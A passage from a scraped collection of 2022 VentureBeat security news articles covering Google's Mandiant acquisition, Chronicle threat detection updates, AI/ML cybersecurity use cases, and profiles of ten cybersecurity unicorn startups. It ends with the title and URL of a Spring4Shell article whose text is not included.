they using to try to get inside? And once they’re inside, how do they move laterally?” Accomplishing this is partly about having the right instrumentation — which provides the telemetry to see what attackers are doing, according to Sentonas. But the other part is having the ability to spot the indicators of compromise, he said. “And if you don’t,” Sentonas said, “then you need to work with an organization that has the ability to do that for you.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,099
2,022
"Google to acquire cybersecurity company Mandiant for $5.4B | VentureBeat"
"https://venturebeat.com/2022/03/08/google-to-acquire-cybersecurity-company-mandiant-for-5-4b"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Google to acquire cybersecurity company Mandiant for $5.4B Share on Facebook Share on X Share on LinkedIn Mandiant Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Google has confirmed plans to acquire cybersecurity company Mandiant in an all-cash deal worth $5.4 billion, after rumors first emerged yesterday of an impending deal. The move comes exactly a month after reports emerged that Microsoft was in early discussions to buy Mandiant, meaning that Google is essentially getting one over its big cloud rival. Mandiant works with customers including InfoSys, OlyFed, and the Bank of Thailand, providing threat intelligence and consulting services, and automated tools for investigating security alerts. Mandiant is perhaps better known under its former name FireEye, a U.S. cybersecurity firm that shot to prominence for detecting major cyberattacks through the years. FireEye had acquired Mandiant for $1 billion in 2013, but last year it revealed plans to sell off the FireEye brand and products business and focus on its Mandiant cyber forensics business instead. As part of the transaction, FireEye changed its corporate name to Mandiant. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! ‘Unprecedented cybersecurity challenges’ From Google’s perspective, buying Mandiant makes a great deal of sense, given its clear interest in bolstering its cloud platform and selling its ware to enterprises the world over. As a result of the transaction, Mandiant will become part of Google Cloud, where it will offer advisory services to help companies reduce risk before, during, and after security incidents; power additional threat detection, intelligence, and automated incident response tools; and more. “Organizations around the world are facing unprecedented cybersecurity challenges as the sophistication and severity of attacks that were previously used to target major governments are now being used to target companies in every industry,” Google Cloud CEO Thomas Kurian said in a press release. “We look forward to welcoming Mandiant to Google Cloud to further enhance our security operations suite and advisory services, and help customers address their most important security challenges.” Google said that it expects to close the Mandiant acquisition later this year, pending the usual regulatory and shareholder approvals. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,100
2,022
"Google Chronicle adds 'context-aware' cyber threat detection | VentureBeat"
"https://venturebeat.com/2022/03/15/google-chronicle-adds-context-aware-cyber-threat-detection"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Google Chronicle adds ‘context-aware’ cyber threat detection Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Google Cloud today announced the next series of updates to its Chronicle security platform, aimed at helping to enhance security operations with improved detection of threats. The updates introduce “context-aware” threat detection to Chronicle, a capability that is available now as a public preview. The capability shows that Google is “creating efficiencies in every step of a customer’s detection and response journey, starting by making alerts more functionally enable,” members of the Google Chronicle team said in a blog post today. The unveiling of the new capability follows Google’s announcements of two major acquisitions in security that will be tied in with Chronicle. In January, Google acquired Siemplify, a provider of security orchestration, automation and response (SOAR) technologies. And earlier this month, the company announced an agreement to acquire cybersecurity powerhouse Mandiant for $5.4 billion, which is poised to bring a range of capabilities to the Google Cloud security platform including threat intelligence, incident response and managed defense. Google Cloud is ultimately aiming to deliver an “end-to-end security operations suite to help enterprises stay protected at every stage of the security lifecycle,” said Phil Venables, CISO at Google Cloud, during a news conference last week. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Improving threat response With today’s announcement, Google is acknowledging that customers need “access to all context across their entire IT stack while responding to malicious threats,” to help with forming a strategy around threat response, the Chronicle team said in a blog post. The post also notes that “alert fatigue” has afflicted many security teams, with an overload of alerts coming in from security tools that limit their ability to prioritize the threats that really matter most. This is where “context-aware” detections come in for Google Chronicle. With the new feature, “all the supporting information from authoritative sources (e.g., CMDB, IAM, and DLP) including telemetry, context, relationships, and vulnerabilities are available out of the box as a ‘single’ detection event,” the Chronicle team said. Key capabilities include the ability to use risk scoring to prioritize threats, respond to alerts more quickly and get higher-fidelity for their alerts, according to the post. The Chronicle team noted that security information and event management (SIEM) tools and other security analytics to date have struggled to provide this sort of functionality to customers. “This launch fixes a paradigm gap in legacy analytics and SIEM products, where data has historically been logically separated due to prohibitive economics,” the team said in the blog post. “Customers can now operationalize all their security telemetry and enriching data sources in one place, giving them the ability to develop flexible alerting and prioritization strategies.” Faster response times All in all, response and recovery times will be accelerated “by minimizing the need to wait for contextual understanding before making a decision and taking an investigatory action,” Google Chronicle’s team said in the post. Google did not specifically say when context-aware threat detection in Chronicle will be generally available. The Chronicle team did say, however, that “over the next months as we move these modules towards general availability, you can expect to see a steady release of new detection capabilities and integrations with other parts of Google Cloud and additional third party providers.” Other recent updates from Google Cloud in security have included the addition of detection for cryptocurrency mining in virtual machines and the debut of Cloud IDS , a cloud-native network security offering that aims to provide simplified deployment and use. Notably, Chronicle and Siemplify are all about “ interoperability between a ton of other technologies — [they] work with every firewall company, work with all the endpoint companies, work with logs generated from different applications,” Mandiant CEO Kevin Mandia said in a news conference last week. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,101
2,022
"5 ways AI and ML will improve cybersecurity in 2022 | VentureBeat"
"https://venturebeat.com/2022/01/19/5-ways-ai-and-ml-will-improve-cybersecurity-in-2022"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages 5 ways AI and ML will improve cybersecurity in 2022 Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Cyberattacks are happening faster, targeting multiple threat surfaces simultaneously using a broad range of techniques to evade detection and access valuable data. A favorite attack strategy of bad actors is to use various social engineering, phishing, ransomware , and malware techniques to gain privileged access credentials to bypass Identity Access Management (IAM) and Privileged Access Management (PAM) systems. Once in a corporate network, bad actors move laterally across an organization, searching for the most valuable data to exfiltrate, sell, or use to impersonate senior executives. IBM found that it takes an average of 287 days to identify and contain a data breach, at an average cost of $3.61M in a hybrid cloud environment. And when ransomware is the attack strategy, the average cost of a data breach skyrockets to $4.62M. Using AI to anticipate and lure attacks A perfect use case for AI and machine learning (ML) is deciphering the millions of concurrent data connections a typical enterprise has with the outside world at any given minute. Training supervised machine learning algorithms with data streams helps them identify potential anomalies, even before the algorithm understands what the definition of an anomaly is, according to Boston Consulting Group. Using AI and ML to lure attackers into simulated environments to analyze their attack strategies, components, and code needs to start at the transaction level. Transaction fraud detection is one of five core areas where AI and ML can improve cybersecurity this year. Additionally, malware detection and user & machine behavioral analysis are among the top five use cases delivering the most value based on their use of AI and ML this year. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Another report by Boston Consulting Group’ compares AI use cases in cybersecurity, comparing complexity and benefits. Cybersecurity vendors whose platforms are in the “high benefits, high complexity” quadrant are the best equipped to use AI and ML to lure attackers into simulated honeypots and reverse engineer their payloads, often down the executable file level. Above: AI’s contributions to cybersecurity are differentiated by Operational Technology (OT), IoT, and IT use cases, with each sharing the same attribute of using machine learning to identify anomalies in transaction and operations data then assign risk scores. How AI will improve cybersecurity in 2022 CISOs tell VentureBeat that the AI and ML use cases in which they see the greatest payoff are pragmatic and driven by the need to reduce the overwhelming workload their analysts face daily. While the apps and platforms each have advanced analytics and detailed modeling, the full feature set rarely gets used. Enterprises see AI and ML cybersecurity-based systems as relief for their overwhelmed staff. Fifty-six percent of executives say their cybersecurity analysts are overwhelmed, according to BCG. When CISOs take a more pragmatic view of AI and ML’s potential contributions to their operations, they often focus on better protecting machine-based transactions. It’s the machine-based transaction attacks that most concern CISOs and their teams because they’re so quick, difficult to identify, predict, and stop. BCG found that 43% of executives see an increase in machine-speed attacks. With seven out of every 10 executives believing they can’t respond or thwart advanced cyberattacks without AI, the demand for AL and ML-based cybersecurity systems in the following five core areas continues to grow. 1. Transaction fraud detection – CISOs tell VentureBeat that the pandemic’s effects on their ecommerce sales are the primary catalyst for investing in AI and ML-based transaction fraud detection. Transaction fraud detection is designed to provide real-time monitoring of payment transactions, using ML techniques to identify anomalies and potential fraud attempts. In addition, ML algorithms are being trained to identify login processes and prevent account takeovers (ATOs), one of the fastest-growing areas of online retail fraud today. Leading online retailers are training their cybersecurity analysts on transaction fraud detection systems and having their data scientists work with vendors to spot identity spoofing and the use of stolen privileged access credentials. Identifying behaviors that don’t fit with the legitimate account holders are also helping to stop impersonation and stolen credential attacks. Fraud detection and identity spoofing are converging as CISOs and CIOs want a single AI-based platform to scale and protect all transactions. Equifax acquired Kount in 2021 to expand its digital identity and fraud prevention solutions footprint. Leading vendors include Accertify, Akamai, Arkose Labs, BAE Systems Cybersource, IBM, LexisNexis Risk Solutions, Microsoft, NICE Actimize, and several others. 2. Account Takeover (ATO) – Cybersecurity teams who define multifactor authentication (MFA) as a standard to pass audits and attain regulatory compliance are missing the point and often get hacked with successful account takeover (ATO) attempts. The most reliable approaches to MFA need to include three core areas of something only the user knows, something only the user holds, and something the user is or does. True MFA will include at least two of these three attributes by the user. However, getting users’ behavior to change permanently is far more difficult and a longer-term challenge. That’s why enterprises adopt AI and ML-based platforms that can calculate and assign a risk score for each interaction using a broader set of external variables or indicators aggregated into a series of analytics. AI and ML-based platforms offering protection against ATO are configurable for the relative levels of risk management a given organization wants to take on. When risk scoring identifies a suspicious email or file, it automatically quarantines it to protect all users on the network. Leading ATO providers include Avanan, Experian, Iovation, and others. Leading providers of passwordless authentication solutions include Microsoft Azure Active Directory (Azure AD), Ivanti Zero Sign-On (ZSO), OneLogin Workforce Identity, and Thales SafeNet Trusted Access. Ivanti Zero Sign-on (ZSO) is noteworthy for its use of adaptive authentication, including multifactor authentication (MFA) based on risk. Zero Sign-On also relies on biometrics, including Apple’s Face ID, as a secondary authentication factor to access work email, unified communications and collaboration tools, and corporate-shared databases and resources. It’s integrated into the Ivanti Unified Endpoint Management (UEM) platform. 3. Defending against ransomware – Organizations fell victim to a ransomware attack every 11 seconds by 2021, up from 40 seconds in 2016, and the average cost of a traditional breach reached $3.86 million. Absolute Software has analyzed the anatomy of ransomware attacks and provided key insights in their study. Their analysis of how a ransomware attack takes place is illustrated in the graphic below: Above: Absolute Software’s anatomy of a ransomware attack illustrates why implementing cybersecurity training, regularly updating anti-virus and anti-malware, and backing up data to a non-connected environment is essential for preventing an attack. Taking steps to improve the security hygiene of an enterprise, including adopting MFA on every endpoint, is just the starting point. Getting patch management right can make a difference in how secure an enterprise stays when bad actors attempt to launch a ransomware attack. AI and ML are making a difference against ransomware by automating patch management with bots instead of relying on brute-force endpoint inventory methods. AI-powered bots use constraint-based algorithms to pinpoint which endpoints need updates and probable risk levels. Algorithms use current and historical data to identify the specific patch updates and provide the build any given endpoint device needs. Another advantage of taking more of a bot-based approach to patch management is how it can autonomously scale across all endpoints and networks of an organization. Automated patch management systems need more historical ransomware data to train AI and machine learning-based models better and fine-tune their predictive accuracy further. That’s what makes the approach taken by RiskSense, which Ivanti recently acquired, noteworthy. Ivanti gained the largest, most diverse data set of vulnerabilities and exposures through the RiskSense Vulnerability Intelligence and Vulnerability Risk Rating. The risk ratings reflect the future of ML-driven patch management by prioritizing and quantifying adversarial risk based on factors such as threat intelligence, in-the-wild exploit trends, and security analyst validation. Microsoft accelerating acquisitions in cybersecurity reflects the priority they are putting on ransomware. In a blog post , Microsoft announced its acquisition of RiskIQ on July 12, 2021. RiskIQ’s services and solutions will join Microsoft’s suite of cloud-native security products, including Microsoft 365 Defender, Microsoft Azure Defender, and Microsoft Azure Sentinel. 4. Identity proofing – Bad actors attempt to create false identities and privileged access credentials with banks, educational institutions, financial services, and health care facilities to defraud the institution and potentially breach its systems. Identity proofing reduces fraud by verifying the identity of new customers when they submit applications for care, enrollment or services, account openings, and balance transfers for new accounts. AI and ML adoption are diverse across the identity proofing market, including identity affirmation and identity proofing tools. ML algorithms rely on convolutional neural networks to assess the authenticity of photo IDs and related photo-based documents, applying attack detection techniques to an image before attempting to match it to the photo ID. Identity proofing and affirmation are both needed to reduce fraud, which is one of the challenges vendors competing in this market are addressing through API-based integration across platforms. Additionally, identity-proofing vendors are seeing exponential growth due to the pandemic, with venture capital firms investing heavily in this area. Identity verification startup Incode, which recently raised $220 million in a Series B funding round, led by General Atlantic and SoftBank with additional investment from J.P. Morgan and Capital One, is one of many new entrants in this growing market. 5. Process behavior analysis – AL and ML are paying off in this area of cybersecurity today due to their combined strengths at quickly identifying potential breach attempts and acting on them. Process behavior analysis concentrates on identifying anomalous, potentially malicious behavior earlier based on patterns in behavior. As a result, it’s proven particularly effective in thwarting attacks that don’t necessarily carry payloads. An excellent example of process behavior analysis is how Microsoft Defender 365 relies on behavior-based detections and machine learning to identify when endpoints need to be healed and carry out the necessary steps autonomously with no human interaction. Microsoft 365 does this by continually scanning every file in Outlook 365. Microsoft Defender 365 is one of the most advanced behavioral analysis systems supporting self-healing endpoints capable of correlating threat data from emails, endpoints, identities, and applications. When there’s a suspicious incident, automated investigation results classify a potential threat as malicious, suspicious, or “no threat found.” Defender 365 then takes a series of autonomous actions to remediate malicious or suspicious artifacts. Remediation actions include sending a file to quarantine, stopping a process, isolating a device, or blocking a URL. A Virtual Analyst is also part of the Microsoft 365 Defender suite that provides autonomous investigation and response. Above: Microsoft Defender Security Center Security operations dashboard monitors potential threats using process behavior analysis techniques, with the data shown above based on an analysis of Endpoint Detection and Response (EDR) real-time activity. Enterprises need to prioritize cybersecurity in 2022 Improving cybersecurity from the endpoint to the core of IT infrastructures needs to be every enterprise’s goal in 2022. AI and ML show potential in five core areas to improve cybersecurity, thwart ransomware attempts, and learn from data patterns to predict potential attack scenarios and attack vectors. Attacks happen faster, with greater precision, and with more orchestrated force today than ever before, often relying on machine-to-machine communication. AI and ML stand the best chance of keeping up with the onslaught of cyber-attack attempts while also increasing the pace of innovation to outsmart attackers who are always stepping up their efforts. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,102
2,022
"Cybersecurity has 53 unicorns. Here are 10 to watch | VentureBeat"
"https://venturebeat.com/2022/03/17/cybersecurity-has-53-unicorns-here-are-10-to-watch"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Cybersecurity has 53 unicorns. Here are 10 to watch Share on Facebook Share on X Share on LinkedIn Tech startups with billion-dollar "unicorn" valuations may be common — but at least in the cybersecurity market, such valuations do typically signify strong revenue growth. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. It’s true: The term unicorn stopped meaning “rare” years ago. And today, in the cybersecurity market alone, there are actually dozens of privately held companies with billion-dollar valuations. But while becoming a unicorn may not mean what it used to, it’s not a meaningless milestone, either. At least in the security market, getting a billion-dollar valuation usually does signify that the startup has a fast-growing business underway, among other things. Dave DeWalt, who knows a thing or two about cyber businesses, said as much to me in an interview last month. Though 30 privately held security companies achieved unicorn valuations in 2021 — up from six in 2020 — that doesn’t automatically imply there’s a bubble, said DeWalt, who previously served as CEO of FireEye and McAfee, and is now a venture investor. Many of these security companies are building real businesses, he said — and addressing real threats, often from state-sponsored adversaries, that aren’t going away. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Why are we seeing so many security vendors reach unicorn valuations? “It’s because the threat is persistent,” said DeWalt, now the founder and managing director at venture firm NightDragon. “And that’s why I think [these companies are] real, and this is here to stay.” Tracking the herd By my tally, there are currently 53 cybersecurity vendors with privately held valuations of $1 billion or more. My main source for this is the CB Insights unicorn list , though my count isn’t identical to theirs (a few security vendors were either missing or classified in other categories besides cybersecurity on their list). Regardless, getting the number of cybersecurity unicorns exactly right doesn’t seem too important. All you need to know is that there are a ton of them now. More crucially: Which security companies, in this ever-expanding unicorn herd, might be worth a closer look for enterprise and midmarket customers? I’ve chosen 10 of the current security unicorns to highlight here. My criteria is that they’re reporting strong growth; they’re in a fast-growing market; and I’ve had the chance to interview their CEO or president in recent months, giving me a sense of their strategy, differentiators and traction with customers. This isn’t to say the other security unicorns aren’t differentiated, seeing significant growth and operating in a hot market. Though, VentureBeat couldn’t include them all (and hasn’t been able to interview all of the unicorn companies’ CEOs as of this point). So, what follows are the key details on these 10 cybersecurity unicorns that are worth watching right now, in areas of the market including cloud security, cloud-native application security, managed detection and response, passwordless identity authentication and zero trust segmentation. Vendors are ranked by their latest available valuation, provided at the time of their most recent funding round. All quotes are from recent VentureBeat interviews, and all metrics were supplied by the vendors. Snyk Founded : 2015 Valuation : $8.5 billion ( September 2021 ) Customers : 1,800 at the end of Q1 (up 100% year-over-year) Employees : 1,200 at the end of Q1 (up more than 100% year-over-year) Snyk specializes in offering tools for scanning and fixing code — built to be familiar to developers and integrated into the existing development process — with the aim of ensuring that applications are built securely from the get-go. The company believes that in order to provide a great developer security platform, “it should be weaved into the daily lives of the development teams,” said Snyk cofounder and president Guy Podjarny. “We’re there to cover the full scope of the cloud-native application — always with that developer-first approach.” Snyk is now expanding its offerings to include cloud security, with the recent acquisition of Fugue. By combining with Fugue’s cloud security posture management technology, the Snyk platform will be able to provide developers with “continuity all the way from their code to the cloud deployments,” Podjarny said. “To equip developers with building secure software and owning it, they have to go past the pipelines into understanding what is deployed,” Podjarny said. That includes “understanding what security mistakes are deployed,” he said, “so they can own that and they can help secure it.” Lacework Founded : 2014 Valuation : $8.3 billion ( November 2021 ) Customers : Total number not disclosed; by the end of 2021, Lacework saw a 3.5X year-over-year increase in new customers Employees : More than 1,000 (up from 200 in January 2021) Lacework offers a cloud security platform that excels at collecting, processing and normalizing data across cloud environments — and then deriving insights for customers, Lacework co-CEO Jay Parikh said. “We fundamentally bring a different approach,” Parikh said. “And we can innovate faster and we can provide a much more comprehensive, end-to-end approach.” Central to Lacework’s technology is the Polygraph Data Platform, which collects and correlates data in cloud environments, detects potential security issues and prioritizes the biggest threats for response. Key capabilities include anomaly detection powered by machine learning, as well as deep visibility across cloud and container workloads. Notably, Lacework brings the ability to both scan for vulnerabilities and also show in production where the flaws might be exploited, Parikh said. “Some companies can just do the scanning, but they can’t do the production analysis,” he said. “We can do both, and it’s all on the same platform.” Wiz Founded : 2020 Valuation : $6 billion (October 2021) Customers : Total number not disclosed; “more than 20% of the Fortune 500” Employees : More than 200 Wiz offers a cloud security product that unifies a number of different capabilities, deploys quickly, provides broad visibility and enables customers to prioritize threats, according to two of the startup’s founders, CEO Assaf Rappaport and vice president of product Yinon Costica. The product’s agentless approach helps enable the rapid deployment, the founders said. “Literally you can finish a Wiz deployment in a week, even in the largest enterprises,” Costica said. Wiz works by implementing a security graph, allowing for the correlation of the many different signals in cloud environments — prioritizing the risks “very effectively across even the largest environments,” he said. The product “changes dramatically the way organizations are able to gain visibility to cloud environments,” Costica said. “I think these two components — the ability to prioritize effectively and to deploy really easily — are making the difference for customers, versus what they have today,” he said. Arctic Wolf Founded : 2012 Valuation : $4.3 billion ( July 2021 ) Customers : 2,700 (up from 1,500 a year ago) Employees : 1,500 (up from 650 a year ago) With Arctic Wolf’s security operations platform — which offers a full gamut of security solutions, paired with the ability to ingest security data from a customer’s existing tools — the company has the potential to “unify the cybersecurity market wholesale,” CEO Nick Schneider said. The platform includes 24/7 monitoring of endpoints, networks and clouds; detection of threats; and response and recovery if a cyberattack occurs. The MDR service is provided by a concierge security team that serves to eradicate false positives and alert fatigue. Arctic Wolf’s MDR is complemented by digital risk management (tailored to each individual customer); managed security awareness (providing security training, phishing tests and coaching to employees); and cloud detection and response (to help with improving cloud security posture). While a number of other security vendors offer some of these solutions, “that combination of modules, or that combination of outcomes sitting on top of the platform — we’re really the only vendor that does that,” Schneider said. “And from a customer’s perspective, what that means is they get a unified experience across those different areas of their business — detection, risk, cloud, security awareness and training.” Illumio Founded : 2013 Valuation : $2.75 billion ( June 2021 ) Customers : Total number not disclosed; company has added more than 140 customers in the past year Employees : 519 (up from 384 a year ago) Illumio offers zero-trust segmentation solutions for both datacenter and cloud environments, which enable isolation of attackers post-breach. With the Illumio zero-trust segmentation solution, a customer’s cloud and datacenter environments can be broken down into different segments — all the way down to the level of workload — which can each be locked down with their own security controls. Illumio stands out as “the only standalone zero-trust segmentation company,” said cofounder and CEO Andrew Rubin. “We started the company to solve this problem. We’ve built our technology specifically to address it. And at some of our largest customers, we address it at massive global scale.” Ultimately, “we are focused on only solving this problem,” Rubin said. “And we believe that that has allowed us to build a better platform and a more scalable platform.” Sysdig Founded : 2013 Valuation : $2.5 billion ( December 2021 ) Customers : 700 at the end of 2021 (roughly doubled year-over-year) Employees : Nearly 600 (up from roughly 250 a year ago) Container and cloud security vendor Sysdig offers a security platform that offers more in-depth visibility and better prioritization of threats than other vendors, CEO Suresh Vasudevan said. The platform’s “open source foundation” — it’s built on top of two open-source threat detection projects — has also continued to help set the company apart, Vasudevan said. Sysdig’s platform offers capabilities spanning cloud-native application development security; detection and response to runtime threats; and management of configurations and permissions. “The fact that we’ve built an end-to-end platform allows us to have a much better sense of how to prioritize, what to focus on, and how to remediate issues at the source — at the time when you’re building your software rather than much later when you’re deployed in production,” Vasudevan said. Orca Security Founded : 2019 Valuation : $1.8 billion ( October 2021 ) Customers : “Hundreds of customers” (up 400% year-over-year) Employees : 307 (up from 71 a year ago) Orca Security offers a cloud protection platform that unites several different tools and doesn’t require an agent, simplifying and expediting the deployment of the platform. The biggest value for customers is “having one platform that leverages data from the entire stack to prioritize risk,” CEO and cofounder Avi Shua said. In that way, Orca can surface not just the underlying security issue, but also its business impact, Shua said. Using Orca’s “SideScanning” technology that collects data from cloud environments, the platform provides full visibility of cloud environments and connects the dots in security alert data to enable risk prioritization, Shua said. Key capabilities include solutions for managing cloud vulnerabilities; spotting misconfigurations in cloud accounts and workloads; and detecting malware and lateral movement in cloud environments. Beyond Identity Founded : 2020 Valuation : $1.1 billion ( February 2022 ) Customers : Total number not disclosed; customer base grew 640% in 2021, year-over-year Employees : 185 (up from 118 a year ago) Beyond Identity has developed a solution for multifactor authentication (MFA) that’s focused on “cutting out the friction — making it truly invisible to a user, or to a company, that they’ve turned on MFA,” said cofounder and CEO Tom “TJ” Jermoluk. A key element is that the MFA solution is passwordless, accomplished through cryptographically embedding a user’s identities into their devices. “Our users don’t have to look at a one-time code or a push notification, or any of that,” Jermoluk said. When a user opens an application on their PC or smartphone, using the company’s system, the user can be automatically logged in without needing to enter any information. Beyond Identity also provides a zero trust “risk engine” that ensures only valid users can authenticate, Jermoluk said — which “allows us to have this visibility that nobody else can get” in an identity security solution. Among the goals for Beyond Identity, he said, is “to have this platform be adopted as the de facto zero trust platform.” Ultimately, Beyond Identity brings the opportunity to “solve so many of the different problems that have existed [in security] with one platform,” Jermoluk said. BlueVoyant Founded : 2017 Valuation : “Substantially more than $1 billion” ( February 2022 ) Customers : More than 700 at the end of 2021 (up 80% year-over-year) Employees : Nearly 600 (almost doubled from a year ago) BlueVoyant provides both internal security and external cyber risk management for customers. The company’s managed detection and response (MDR) offering stands out with capabilities for analyzing massive amounts of data as part of its threat detection, according to BlueVoyant cofounder and CEO Jim Rosenthal. And when it comes to external cyber risk management, what BlueVoyant offers is one-of-a-kind, Rosenthal said. “We do supply chain defense, as opposed to supply chain risk scoring,” he said. BlueVoyant looks at every participant in a customer’s supply chain, and identifies any externally detectable, severe vulnerabilities that an attacker would see. The company then interacts with the supplier to make sure that the issues are remedied — solving the problem on the customer’s behalf, Rosenthal said. As of right now, when it comes to supply chain defense of this type, “no one else does it,” Rosenthal said. “And it is what the world needs — if you want to prevent attackers from either disrupting your operations, or disrupting the supply chain, or moving upstream in an operation to the enterprise itself.” Aqua Security Founded : 2015 Valuation : “In excess of $1 billion” ( March 2021 ) Customers : More than 450 (up from 400 a year ago) Employees : 530 (up from 300 a year ago) Aqua Security offers a cloud-native application protection platform that spans the app development lifecycle, with capabilities for securing the build, infrastructure and workload/runtime. The company acquired a startup in December, Argon, that adds a solution for securing the software supply chain to the platform, as well. When it comes to securing cloud-native technologies such as containers and microservices, there is now “a clear realization in the market that [companies’] existing security solutions do not apply for this new stack,” said cofounder and CEO Dror Davidoff. Aqua’s various modules are offered individually, but are also integrated in order to “connect the dots” and provide a full security picture for a customer’s cloud-native stack, Davidoff said. The company has been investing heavily to “create a lot of complementary value between the different modules — and really turn it into one solution,” he said. Ultimately, “I can say very comfortably that we’re the one that’s really looking at the complete lifecycle — from your software supply chains all the way to your production, and having all the [solutions] along the way,” Davidoff said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,103
2,022
"Spring4Shell vulnerability likely to affect real-world apps, analyst says | VentureBeat"
"https://venturebeat.com/2022/03/30/spring4shell-vulnerability-likely-to-affect-real-world-apps-analyst-says"
